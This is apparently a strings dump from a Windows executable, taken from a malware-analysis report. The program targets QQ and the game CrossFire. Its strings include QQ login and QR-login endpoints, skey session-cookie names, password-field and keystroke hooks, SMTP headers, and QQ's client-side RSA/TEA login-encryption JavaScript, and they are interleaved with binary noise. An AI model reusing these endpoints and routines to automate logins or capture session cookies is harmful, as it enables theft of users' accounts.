hXXp://iyouxi.vip.qq.com/ams3.0.php?g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
hXXp://proxy.vac.qq.com/cgi-bin/srfentry.fcgi?ts=1456988761581&g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13D15 QQ/6.2.2.402 Pixel/640 NetType/WIFI Mem/86
&_=1452520903377
hXXp://pay.video.qq.com/fcgi-bin/sign?callback=jQuery111006800204519842937_1452520903238&low_login=1&uin=
hXXp://buluo.qq.com/cgi-bin/bar/card/bar_list_by_page
hXXp://buluo.qq.com/cgi-bin/bar/user/sign
hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?uin=
hXXp://qiandao.qun.qq.com/cgi-bin/new_flag
hXXp://qiandao.qun.qq.com/cgi-bin/sign
hXXp://c.pc.qq.com/fcgi-bin/signin?callback=jsonp1453084008086&_=1453084046097&mood_id=238&checkin_date=&remark=一支穿云箭 千军万马来相见。
08 08 08 50
hXXp://cfzhushou.com/cfzs/help.html
hXXp://cfzhushou.com/help.html
hXXp://VVV.cfzhushou.com/cfzs/help.html
hXXp://ip.qq.com/cgi-bin/myip
hXXps://aq.qq.com/cn2/safe_service/device_lock
hXXp://ossweb-img.qq.com/images/clientpop/act/cf/GpmHelpAct.js
http2://ossweb
hXXp://ossweb
"img":"http2(.*?).jpg"
"hXXp://(.*?)":{
"~ /1~!<
fD.nn'1r?
.KM8'
$&%cw]
hXXp://leesin.zuhaowan.com-
hXXp://leesin.zuhaowan.cn
hXXp://captcha.qq.com/getimage?aid=210001040.5721703316085041
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=41615&sServiceDepartment=group_f
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=qqgame&iActivityId=41615&sServiceDepartment=group_h&set_info=group_h
hXXp://webd.tgp.qq.com/cf/info_proxy/weapon_stat_info?&&zone_id=
1970.01.01 08:00:00
function timea(){var d,s;d=new Date();d.setTime('
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=55856&sServiceDepartment=group_f
hXXp://apps.game.qq.com/cf/a20160726hxb/getUserTask.php?action=getMyTaskList&iArea=
Referer:hXXp://cf.qq.com/act/a20160726hxb/index.htm
hXXp://apps.game.qq.com/daoju/appmarket/daoju_promotion/cloud_ticket/QueryCloudTicket.php?acctid=A100078&id=28&time=0.23177661886438727&_=1461381268102
"sMsg":"MODULE OK"
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=http%3A%2F%2Fbang.qq.com%2Fmain%2Ftradeinfo%2F&sServiceDepartment=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=214216&g_tk=
|322|
*&checkparam=cf|yes|
&ams_checkparam=cf|yes|
sCdKey=
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=8918&sServiceDepartment=x1m1
sMsg" : "
\gzip.dll
`.data
gzip.pdb
_u%SV
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
hXXp://apps.game.qq.com/cgi-bin/cf/a20090409forceout/getinfo.cgi
hXXp://VVV.cfzhushou.com/app/
hXXp://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=21000124&s_url=hXXp://cf.qq.com&style=34
hXXps://ssl.ptlogin2.qq.com/ptqrshow?appid=21000124&e=2&l=M&s=3&d=72&v=4&t=0.8120921131107115&daid=8
hXXps://ssl.ptlogin2.qq.com/ptqrlogin?u1=hXXp://cf.qq.com&ptqrtoken=#{ptqrtoken}&ptredirect=1&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=0-1-1491575693107&js_ver=10210&js_type=1&login_sig=#{login_sig}&pt_uistyle=40&aid=21000124&daid=8&has_onekey=1&
#{login_sig}
('0','0','
&js_ver=10210&js_type=1&login_sig=4I5ZCJhgOyvHYIR7edjyKchOesPKbLWadY1YKeoQHyTQu63TEXeJCdU6UZgyOeKv&pt_uistyle=34&aid=549000912&
hXXps://ssl.ptlogin2.qq.com/ptqrlogin?u1=hXXps://qzone.qq.com&ptredirect=1&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=0-0-
for(var e=0,i=0,n=t.length;n>i;  i)
e =(e<<5) t.charCodeAt(i);
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=21000124&s_url=hXXp://cf.qq.com/comm-htdocs/login/logincallback.htm&style=34
hXXp://cf.qq.com/cfvip/
hXXp://xinyue.qq.com
o%%co
``PBi %c
<\-M}*0_
{56FDF344-FD6D-11d0-958A-006097C9A090}
{EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF}
Report
themepassword
SysShadow.HostWnd
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
VBScript.RegExp
1970-01-01 00:00:00
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
background(?:-image)?:.*?[\s]*?url[\s]*?\([#
']?(.*?)[#
onkeydown|
onkeyup|
onkeypress|
wA{0002DF05-0000-0000-C000-000000000046}
{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}
{6D5140C1-7436-11CE-8034-00AA006009FA}
text|password|file
?)-D%f`
location.reload()
window.location.href="
{25336920-03F9-11CF-8FD0-00AA00686F13}
hXXp://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js
document.all.retjs.innerText=
javascript:document.body.contentEditable='true';document.designMode='on';void 0;
javascript:document.body.contentEditable='false';document.designMode='on';void 0;
javascript:document.onsdragstart=document.onselectstart=document.oncontextmenu=function(){return true}
javascript:document.onselectstart = document.oncontextmenu = document.onmousedown = document.onkeydown = function(){return true;};
WarnOnHTTPSToHTTPRedirect
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
type=password
[password]
var jies = document.getElementsByTagName('object');for(var jie in jies){if(jies[jie].classid=='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000'){jies[jie].removeNode(true);}}
user.qzone.qq.com
mail.qq.com
onkeyup
type='password'
type="password"
, 1, , ,
var jie = document.createStyleSheet();jie.addRule('html','
').value="
document.getElementById('
LocationURL
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
window.location.reload()
var jie = document.createStyleSheet();jie.addRule('html','overflow:hidden;');
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
SysShadow.Menu
Microsoft.XMLDOM
HKEY_CURRENT_CONFIG
14:00~16:00
12:00-19:00
1.2.18
%*.*f
MSWHEEL_ROLLMSG
WSOCK32.dll
msscript.ocx
VVV.dywt.com.cn
USER32.DLL
\\.\Smartvsd
\\.\PhysicalDrive%d
\\.\Scsi%d:
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
;3 #>6.&
'2, / 0&7!4-)1#
(*.htm;*.html)|*.htm;*.html
its:%s::%s
(*.avi)|*.avi
WPFT532.CNV
WPFT632.CNV
EXCEL32.CNV
write32.wpc
Windows Write
mswrd632.wpc
Word for Windows 6.0
wword5.cnv
Word for Windows 5.0
mswrd832.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
html32.cnv
.PAVCOleException@@
.PAVCOleDispatchException@@
right-curly-bracket
left-curly-bracket
0123456789
c:\%original file name%.exe
GetKeyboardState
InternetCanonicalizeUrlA
:X.xZ
.FNNNNNNNNNNNNNNV
.FNNNNNNNNNNNN
.CNNNB
.CNNd
ÝDDDDDDQC
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>PAD
AVIFIL32.dll
MSVFW32.dll
oledlg.dll
RASAPI32.dll
1.0.15.507
T%Program Files%\NamuADLook.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
VVV.kubei9.com
VVV.kubei9.com
1.3.6.1
(*.*)
1.0.0.0
6.0.2600.0 (xpclient.010817-1148)
6.0.2600.0
2.6.1.0
VVV.cfzhushou.com

%original file name%.exe_4032_rwx_00401000_0050A000:

t$(SSh
~%UVW
u$SShe
Hw2.Hw
wininet.dll
ole32.dll
kernel32.dll
user32.dll
User32.dll
Kernel32.dll
shell32.dll
gdiplus.dll
GdiPlus.dll
ntdll.dll
Ole32.dll
OleAut32.dll
oleaut32.dll
gzip.dll
gdi32.dll
Gdi32.dll
imm32.dll
OLEACC.DLL
advapi32.dll
shlwapi.dll
atl.dll
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
MsgWaitForMultipleObjects
GetProcessHeap
ShellExecuteA
GetAsyncKeyState
GdipSetStringFormatHotkeyPrefix
RegisterHotKey
UnregisterHotKey
GetUrlCacheEntryInfoA
RegCloseKey
RegCreateKeyA
RegOpenKeyA
GetWindowsDirectoryA
GdiplusShutdown
RegEnumKeyA
RegQueryInfoKeyA
RegFlushKey
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyA
&pt_randsalt=0&u1=http://cf.qq.com/cp/a20160217cfyj/index.htm?e_code=213271&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
hXXp://ptlogin2.qq.com/login?u=
&s_url=http://cf.qq.com/comm-htdocs/login/logincallback.htm&f_url=&ptlang=2052&ptredirect=100&aid=21000124&daid=8&j_later=0&low_login_hour=0®master=0&pt_login_type=1&pt_aid=0&pt_aaid=0&pt_light=0&pt_3rd_aid=0
&service=login&nodirect=0&ptsigx=
hXXp://ptlogin4.game.qq.com/check_sig?pttype=1&uin=
p_skey=
skey=
xlogin
login2
pt_login_sig=
[pt_login_sig]
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXp://
function time(){return Math.random()}
if (e < t.length   11) return uv_alert("Message too long for RSA"),
n = t.length - 1; n >= 0 && e > 0;) {
var o = t.charCodeAt(n--);
for (s[0] = 0; 0 == s[0];) r.nextBytes(s);
this.dmp1 = null,
this.dmq1 = null,
this.coeff = null
null != e && null != i && e.length > 0 && i.length > 0 ? (this.n = t(e, 16), this.e = parseInt(i, 16)) : uv_alert("Invalid RSA public key")
return t.modPowInt(this.e, this.n)
var i = e(t, this.n.bitLength()   7 >> 3);
var n = this.doPublic(i);
var o = n.toString(16);
return 0 == (1 & o.length) ? o: "0"   o
null != t && ("number" == typeof t ? this.fromNumber(t, e, i) : null == e && "string" != typeof t ? this.fromString(t, 256) : this.fromString(t, e))
o = Math.floor(p / 67108864),
return ut.charAt(t)
var i = gt[t.charCodeAt(e)];
return e.fromInt(t),
if (4 != e) return void this.fromRadix(t, e);
for (var n = t.length,
0 > s ? "-" == t.charAt(n) && (o = !0) : (o = !1, 0 == r ? this[this.t  ] = s: r   i > this.DB ? (this[this.t - 1] |= (s & (1 << this.DB - r) - 1) << r, this[this.t  ] = s >> this.DB - r) : this[this.t - 1] |= s << r, r  = i, r >= this.DB && (r -= this.DB))
8 == i && 0 != (128 & t[0]) && (this.s = -1, r > 0 && (this[this.t - 1] |= (1 << this.DB - r) - 1 << r)),
this.clamp(),
o && p.ZERO.subTo(this, this)
for (var t = this.s & this.DM; this.t > 0 && this[this.t - 1] == t;)--this.t
if (this.s < 0) return "-"   this.negate().toString(t);
if (4 != t) return this.toRadix(t);
s = this.DB - p * this.DB % e;
if (p-->0) for (s < this.DB && (i = this[p] >> s) > 0 && (o = !0, r = u(i)); p >= 0;) e > s ? (i = (this[p] & (1 << s) - 1) << e - s, i |= this[--p] >> (s  = this.DB - e)) : (i = this[p] >> (s -= e) & n, 0 >= s && (s  = this.DB, --p)),
return p.ZERO.subTo(this, t),
return this.s < 0 ? this.negate() : this
return this.t <= 0 ? 0 : this.DB * (this.t - 1)   k(this[this.t - 1] ^ this.s & this.DM)
e.t = Math.max(this.t - t, 0),
var i, n = t % this.DB,
o = this.DB - n,
p = Math.floor(t / this.DB),
s = this.s << n & this.DM;
e.clamp()
var i = Math.floor(t / this.DB);
var n = t % this.DB,
o = Math.min(t.t, this.t); o > i;) n  = this[i] - t[i],
e[i  ] = n & this.DM,
n >>= this.DB;
e[i  ] = n & this.DM,
n >>= this.DB;
-1 > n ? e[i  ] = this.DV   n: n > 0 && (e[i  ] = n),
var i = this.abs(),
n = t.abs(),
for (o = 0; o < n.t;   o) e[o   i.t] = i.am(0, n[o], e, o, 0, i.t);
e.clamp(),
this.s != t.s && p.ZERO.subTo(e, e)
for (var e = this.abs(), i = t.t = 2 * e.t; --i >= 0;) t[i] = 0;
var n = e.am(i, e[i], t, 2 * i, 0, 1); (t[i   e.t]  = e.am(i   1, 2 * e[i], t, 2 * i   1, n, e.t - i - 1)) >= e.DV && (t[i   e.t] -= e.DV, t[i   e.t   1] = 1)
t.t > 0 && (t[t.t - 1]  = e.am(i, e[i], t, 2 * i, 0, 1)),
t.clamp()
var n = t.abs();
var o = this.abs();
if (o.t < n.t) return null != e && e.fromInt(0),
void(null != i && this.copyTo(i));
l = this.DB - k(n[n.t - 1]);
l > 0 ? (n.lShiftTo(l, r), o.lShiftTo(l, i)) : (n.copyTo(r), o.copyTo(i));
h = this.FV / d,
for (r.dlShiftTo(v, $), i.compareTo($) >= 0 && (i[i.t  ] = 1, i.subTo($, i)), p.ONE.dlShiftTo(u, $), $.subTo(r, r); r.t < u;) r[r.t  ] = 0;
var w = i[--_] == g ? this.DM: Math.floor(i[_] * h   (i[_ - 1]   f) * m);
if ((i[_]  = r.am(0, w, i, v, 0, u)) < w) for (r.dlShiftTo(v, $), i.subTo($, i); i[_] < --w;) i.subTo($, i)
null != e && (i.drShiftTo(u, e), a != c && p.ZERO.subTo(e, e)),
i.clamp(),
l > 0 && i.rShiftTo(l, i),
0 > a && p.ZERO.subTo(i, i)
return this.abs().divRemTo(t, null, e),
this.s < 0 && e.compareTo(p.ZERO) > 0 && t.subTo(e, e),
return t.s < 0 || t.compareTo(this.m) >= 0 ? t.mod(this.m) : t
t.divRemTo(this.m, null, t)
t.multiplyTo(e, i),
this.reduce(i)
t.squareTo(e),
this.reduce(e)
e = e * (2 - t * e % this.DV) % this.DV,
e > 0 ? this.DV - e: -e
this.mp = t.invDigit(),
this.mpl = 32767 & this.mp,
this.mph = this.mp >> 15,
this.um = (1 << t.DB - 15) - 1,
this.mt2 = 2 * t.t
return t.abs().dlShiftTo(this.m.t, e),
e.divRemTo(this.m, null, e),
t.s < 0 && e.compareTo(p.ZERO) > 0 && this.m.subTo(e, e),
return t.copyTo(e),
this.reduce(e),
for (; t.t <= this.mt2;) t[t.t  ] = 0;
n = i * this.mpl   ((i * this.mph   (t[e] >> 15) * this.mpl & this.um) << 15) & t.DM;
for (i = e   this.m.t, t[i]  = this.m.am(0, n, t, e, 0, this.m.t); t[i] >= t.DV;) t[i] -= t.DV,
t.clamp(),
t.drShiftTo(this.m.t, t),
t.compareTo(this.m) >= 0 && t.subTo(this.m, t)
if (t > 4294967295 || 1 > t) return p.ONE;
o = e.convert(this),
for (o.copyTo(i); --r >= 0;) if (e.sqrTo(i, n), (t & 1 << r) > 0) e.mulTo(n, o, i);
return e.revert(i)
return i = 256 > t || e.isEven() ? new B(e) : new Q(e),
this.exp(t, i)
W((new Date).getTime())
for (Z(), dt = nt(), dt.init(ht), mt = 0; mt < ht.length;   mt) ht[mt] = 0;
return dt.next()
for (e = 0; e < t.length;   e) t[e] = K()
for (i = 0, e = 0; 256 > e;   e) i = i   this.S[e]   t[e % t.length] & 255,
return o.setPublic(e, n),
o.encrypt(t)
i.prototype.doPublic = o,
i.prototype.setPublic = n,
i.prototype.encrypt = r;
st && "Microsoft Internet Explorer" == navigator.appName ? (p.prototype.am = c, rt = 30) : st && "Netscape" != navigator.appName ? (p.prototype.am = a, rt = 26) : (p.prototype.am = l, rt = 28),
p.prototype.DB = rt,
p.prototype.DM = (1 << rt) - 1,
p.prototype.DV = 1 << rt;
p.prototype.FV = Math.pow(2, at),
p.prototype.F1 = at - rt,
p.prototype.F2 = 2 * rt - at;
for (ct = "0".charCodeAt(0), lt = 0; 9 >= lt;   lt) gt[ct  ] = lt;
for (ct = "a".charCodeAt(0), lt = 10; 36 > lt;   lt) gt[ct  ] = lt;
for (ct = "A".charCodeAt(0), lt = 10; 36 > lt;   lt) gt[ct  ] = lt;
B.prototype.convert = P,
B.prototype.revert = D,
B.prototype.reduce = I,
B.prototype.mulTo = M,
B.prototype.sqrTo = U,
Q.prototype.convert = j,
Q.prototype.revert = V,
Q.prototype.reduce = O,
Q.prototype.mulTo = F,
Q.prototype.sqrTo = R,
p.prototype.copyTo = d,
p.prototype.fromInt = h,
p.prototype.fromString = f,
p.prototype.clamp = _,
p.prototype.dlShiftTo = q,
p.prototype.drShiftTo = C,
p.prototype.lShiftTo = S,
p.prototype.rShiftTo = T,
p.prototype.subTo = x,
p.prototype.multiplyTo = A,
p.prototype.squareTo = E,
p.prototype.divRemTo = N,
p.prototype.invDigit = H,
p.prototype.isEven = z,
p.prototype.exp = G,
p.prototype.toString = v,
p.prototype.negate = $,
p.prototype.abs = w,
p.prototype.compareTo = y,
p.prototype.bitLength = b,
p.prototype.mod = L,
p.prototype.modPowInt = X,
p.ZERO = m(0),
p.ONE = m(1);
if ("Netscape" == navigator.appName && navigator.appVersion < "5" && window.crypto && window.crypto.random) {
var _t = window.crypto.random(32);
for (ft = 0; ft < _t.length;   ft) ht[mt  ] = 255 & _t.charCodeAt(ft)
for (; vt > mt;) ft = Math.floor(65536 * Math.random()),
Y.prototype.nextBytes = J,
tt.prototype.init = et,
tt.prototype.next = it;
return Math.round(4294967295 * Math.random())
i = 0; i < t.length; i  ) {
var n = Number(t[i]).toString(16);
1 == n.length && (n = "0"   n),
i = 0; i < t.length; i  = 2) e  = String.fromCharCode(parseInt(t.substr(i, 2), 16));
for (var i = [], n = 0; n < t.length; n  ) i[n] = t.charCodeAt(n);
o = t.length;
for (e = 0; o > e; e  ) i = t.charCodeAt(e),
i > 0 && 127 >= i ? n.push(t.charAt(e)) : i >= 128 && 2047 >= i ? n.push(String.fromCharCode(192 | i >> 6 & 31), String.fromCharCode(128 | 63 & i)) : i >= 2048 && 65535 >= i && n.push(String.fromCharCode(224 | i >> 12 & 15), String.fromCharCode(128 | i >> 6 & 63), String.fromCharCode(128 | 63 & i));
return n.join("")
var i = t.length,
n = t.length;
for (var o = 0; o < i.length; o  ) i[o] = 0;
for (var t = (k.length, 0); 8 > t; t  ) v[t] ^= k[$   t];
if (e) for (var n = 0; n < t.length; n  ) i[n] = 255 & t.charCodeAt(n);
n = 0; n < t.length; n  = 2) i[o  ] = parseInt(t.substr(n, 2), 16);
for (var i = h(t, e), n = a(i), o = "", r = 0; r < n.length; r  ) o  = String.fromCharCode(n[r]);
return q.encode(o)
initkey: function(t, e) {
q.PADCHAR = "=",
q.ALPHA = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /",
q.getbyte = function(t, e) {
var i = t.charCodeAt(e);
q.encode = function(t) {
if (1 != arguments.length) throw "SyntaxError: Not enough arguments";
var e, i, n = q.PADCHAR,
o = q.ALPHA,
r = q.getbyte,
var s = t.length - t.length % 3;
if (0 == t.length) return t;
p.push(o.charAt(i >> 18)),
p.push(o.charAt(i >> 12 & 63)),
p.push(o.charAt(i >> 6 & 63)),
p.push(o.charAt(63 & i));
switch (t.length - s) {
p.push(o.charAt(i >> 18)   o.charAt(i >> 12 & 63)   n   n);
p.push(o.charAt(i >> 18)   o.charAt(i >> 12 & 63)   o.charAt(i >> 6 & 63)   n)
return p.join("")
window.btoa || (window.btoa = q.encode)
return binl2hex(core_md5(str2binl(t), t.length * chrsz))
return binl2str(core_md5(str2binl(t), t.length * chrsz))
p = 0; p < t.length; p  = 16) {
i.length > 16 && (i = core_md5(i, t.length * chrsz));
var p = core_md5(n.concat(str2binl(e)), 512   e.length * chrsz);
return core_md5(o.concat(p), 640)
for (var e = Array(), i = (1 << chrsz) - 1, n = 0; n < t.length * chrsz; n  = chrsz) e[n >> 5] |= (t.charCodeAt(n / chrsz) & i) << n % 32;
i = (1 << chrsz) - 1, n = 0; n < 32 * t.length; n  = chrsz) e  = String.fromCharCode(t[n >> 5] >>> n % 32 & i);
for (var e = hexcase ? "0123456789ABCDEF": "0123456789abcdef", i = "", n = 0; n < 4 * t.length; n  ) i  = e.charAt(t[n >> 2] >> n % 4 * 8   4 & 15)   e.charAt(t[n >> 2] >> n % 4 * 8 & 15);
n = 0; n < 4 * t.length; n  = 3) for (var o = (t[n >> 2] >> 8 * (n % 4) & 255) << 16 | (t[n   1 >> 2] >> 8 * ((n   1) % 4) & 255) << 8 | t[n   2 >> 2] >> 8 * ((n   2) % 4) & 255, r = 0; 4 > r; r  ) i  = 8 * n   6 * r > 32 * t.length ? b64pad: e.charAt(o >> 6 * (3 - r) & 63);
for (var arr = [], i = 0; i < str.length; i  = 2) arr.push("\\x"   str.substr(i, 2));
return arr = arr.join(""),
if (! (Math.random() > (e || 1))) try {
var i = location.protocol   "//ui.ptlogin2.qq.com/cgi-bin/report?id="   t,
n = document.createElement("img");
n.src = i
for (var o = n ? t: md5(t), r = hexchar2bin(o), p = md5(r   e), s = RSA.rsa_encrypt(r), a = (s.length / 2).toString(16), c = TEA.strToBytes(i.toUpperCase(), !0), l = Number(c.length / 2).toString(16); l.length < 4;) l = "0"   l;
for (; a.length < 4;) a = "0"   a;
TEA.initkey(p);
var u = TEA.enAsBase64(a   s   TEA.strToBytes(e)   l   c);
u = u.replace(/[\/\ =]/g,function(t) {return {"/": "-"," ": "*","=": "_"} [t]});
u.replace(/[\/\ =]/g,
"/": "-",
" ": "*",
"=": "_"
o = n   e.toUpperCase(),
r = $.RSA.rsa_encrypt(o);
for (var hex = str.toString(16), len = hex.length, i = len; maxLength > i; i  ) hex = "0"   hex;
for (var arr = [], j = 0; maxLength > j; j  = 2) arr.push("\\x"   hex.substr(j, 2));
var result = arr.join("");
%Program Files%\Internet Explorer\iexplore.exe
%d-d-d d:d:d
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=
"sMsg":"
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=
@1970-01-01 08:00:00
ptlogin2
cf.qq.com
hXXp://login.game.qq.com/comm-cgi-bin/login/LoginReturnInfo.cgi?callback=jsonp21&game=cf
nickName":"
hXXp://q.qlogo.cn/headimg_dl?bs=qq&dst_uin=
-URL:
hXXp://apps.game.qq.com/cgi-bin/cf/userinfo/userinfo.cgi?ssn=
<P class=msg>
MsgBox
SysShadow.SubWnd
[VVV.111Ttt.com]
?kernel32.dll
crossfire.exe
\exdui.dll
.rsrc
@V.Dv
.UmKm
4v %u
oft.XMLDOMnY
\dwmapi.dll
A715A0-6587-11D0-924A_20AFC7/
Leave.CoIn@alize
number is %d.
:"%s"
..0`%X
KERNEL32.DLL
ADVAPI32.dll
ATL.DLL
GDI32.dll
MSVCRT.dll
OLEAUT32.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
exdui.dll
t=.VMV
%%fnW
,7Z.in
k`%u"]
T.ZQ2
CDKEY
CDKEY:
ND ED9MS?WC [H6WU<fL.aF6bB=dM2aN<iE?hO1jL=jP.gP4cP>iQ4kU;mX>qN?EJILOPMSFMRSWKEVYGWYW[_bXcI]dV^bciIDeRAbUMeYNkTChVLmZEm\KhYTrNHsYJ{ZTo`LefYir^saKtcTsd\ti[{eTzf]}iV{k]fhhhkqmtfmqsyiewtivxxz}
ND ED9MS?WB [H6WU<eL-bM;jP.cP>qN?EJILNPMSEMRSVKFVXGVYW[^aXcI]dV]bciIEeSAcVMfZEe[MkTChVLmZEm\JhYTrMGsYJ{ZTeaIgeYir^saKtcTsd\viWui\{eTze]|iU{k\~p_fihhkqlsgmqtyiextjuxxz}
ND EE9LS?WC [I7WT<eL.bM;jP/dP>qN?EJILOPMTDMRSWJE[OTWXFWYWZ^bXcI]dV]bciIEjXEhYUrMGrZIzZTh^aeaIgeYir^saKxgX~p_fhhilrmsgmqtyidslsytjvxxz|
OB EE9LR?WC [I7WT<eL.bM:iP/dQ>qN?EJILOPMTDMRSWIE[OTWXFWYX[^aXcI]dV]bciJEjXEhYUrNGr[IzZTh^bfaIgdYir^saKxgX~p_fhhjlrmsgmqtyidslsysjvxxz|
OB FE9KR?WC [I7WT<eL.bM:iP/dQ>qN?EJIKOPMTDMRSWIE\ORWXFWYX[^aXcI]dV]bciJEjXEhYUrNHr[IzZTh^bfaIhdYir^saKxgX~p_fhhjlrmsgnrtyjeslsysjvxxz|
MB,EE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRSWHE\NSWXFWYX[^aXcI]dV]bciJEjXEhYUrNHr[IzZTg^bfaIhdZir^saJxgX~p_fhhjmrmrhnqtxjermtzsjvxxz|
MB,EE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRRWHE[NSWXFWYX[^aXcI]dV]bciJE`ORjXEhYVqNHr\IyZTg^bfaIhdZir^saJwgX~p_fhhjmrmrhnrtxjerlszsivxxz|
MB,EE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRRWHE[OSWXFWYXZ^aXcI]dV]bbiJE`ORjXEhYVqNHr\IyZTg^bfaIhdZir^saJwgX~p_fhhjmrmrhnrtxjerlszsjvxxz|
wW.Gg
NA EE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRRWHE[OSWXFWYX[^aXcI]dV]bbiJE`ORjYEhYVqNHr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrmrhnrtxjerlszsjvxxz|
NA FE9KR?WC [I7WT<fL.bM:iP/dQ=qN?EJIKOPMTCMRRWHE\OSWXFWYX[^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrmrhnrtxjerlszsjvxxz|
Z|.Gw
MA,FE9KR?WC*[I7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYX[^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrnrhnrtxjerlszsjvxxz|
MA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYXZ^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrnrhnrtxjerlszsivxxz|
MA,EE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYXZ^aXcI]dV]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrnqhnrtxjerlszsjvxxz|
NA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[OSWXFWYX[^aXcI]dW]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhdZir^saJwgX~p_fhhkmrnqhnrtxjerlszsjvxxz|
NA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE\NSWXFWYX[^aXcI]dW]bbiJE`ORjYEhYVqNIr\IyZTg^bfaIhcZir^saJwgX~p_fhhkmrnqhnrtxjerlszsjvxxz|
l.er;
MA,FE9KR?WC*ZI7WT<fL.bM:iP/dQ=qN?EJIKOPMUCMRRWHE[NSWXFWYX[^aXcI]dW]bbiJE`ORjYEhYVqNIr\IyYTg^bfaIhcZir^saJwgX~p_fhhkmrnqinrtxjerlszsjvxyz|
